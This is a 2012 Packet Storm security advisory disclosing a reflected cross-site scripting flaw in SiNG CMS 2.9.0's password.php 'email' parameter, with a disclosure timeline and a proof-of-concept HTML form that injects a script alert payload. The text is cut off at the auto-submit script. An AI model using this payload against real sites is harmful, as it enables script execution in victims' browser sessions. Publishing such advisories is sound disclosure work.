SiNG CMS 2.9.0 Cross Site Scripting

Type packetstorm
Reporter LiquidWorm
Modified 2012-08-23T00:00:00


                                            `<!DOCTYPE html>  
SiNG cms 2.9.0 (email) Remote XSS POST Injection Vulnerability  
Vendor: Simple Network Gear  
Product web page:  
Affected version: 2.9.0  
Summary: SiNG cms is a free modular Content Management System open  
source, based on a bunch of PHP / MySQL and intended use of the web  
server Apache.  
Desc: The application is prone to a reflected cross-site scripting  
vulnerability due to a failure to properly sanitize user-supplied  
input to the 'email' POST parameter in the 'password.php' script.  
Attackers can exploit this weakness to execute arbitrary HTML and  
script code in a user's browser session.  
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)  
Apache 2.4.2 (Win32)  
PHP 5.4.4  
MySQL 5.5.25a  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Vendor status:  
[20.08.2012] Vulnerability discovered.  
[20.08.2012] Initial contact with the vendor.  
[22.08.2012] No response from the vendor.  
[23.08.2012] Public security advisory released.  
Advisory ID: ZSL-2012-5097  
Advisory URL:  
<title>SiNG cms 2.9.0 (email) Remote XSS POST Injection Vulnerability</title>  
<form name="email" method="post" action="http://localhost/singcms/password.php">  
<input type="hidden" name="email" value='"><script>alert("XSS");</script>' />  
<input type="hidden" name="send" value="Send password" />  
<script type="text/javascript">;